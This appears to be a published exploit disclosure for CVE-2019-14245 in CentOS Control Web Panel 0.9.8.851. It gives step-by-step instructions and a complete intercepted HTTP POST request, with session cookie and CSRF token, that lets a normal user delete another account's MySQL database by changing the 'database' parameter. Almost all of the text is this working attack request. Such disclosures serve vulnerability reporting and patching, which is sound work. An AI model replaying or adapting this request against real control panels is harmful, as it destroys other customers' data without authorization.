Share
Exploit Title : CWP (CentOS Control Web Panel) Arbitrary database dropping  
Date : 24 Jul 2019  
Exploit Author : Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak  
Vendor Homepage : https://control-webpanel.com/  
Software Link : Not available, user panel only available for lastest version  
Version : 0.9.8.851  
Tested on : CentOS 7.6.1810 (Core) FireFox 68.0.1 (64-bit)  
CVE-Number : CVE-2019-14245  
Reference : https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-14245.md  
  
1. Log in as a normal user.  
2. Go to "MySQL Manager"  
3. Try to delete any database from the account  
4. Intercept the request, and modify parameter "database" to target database name such as "oauthv2"  
  
POST /cwp_226727d95b77d953/alice/alice/index.php?module=mysql_manager&acc=deletedatabase HTTP/1.1  
Host: 192.168.80.148:2083  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430  
X-Requested-With: XMLHttpRequest  
Content-Length: 20  
Connection: close  
Referer: https://192.168.80.148:2083/cwp_226727d95b77d953/alice/?module=mysql_manager  
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2  
  
database=oauthv2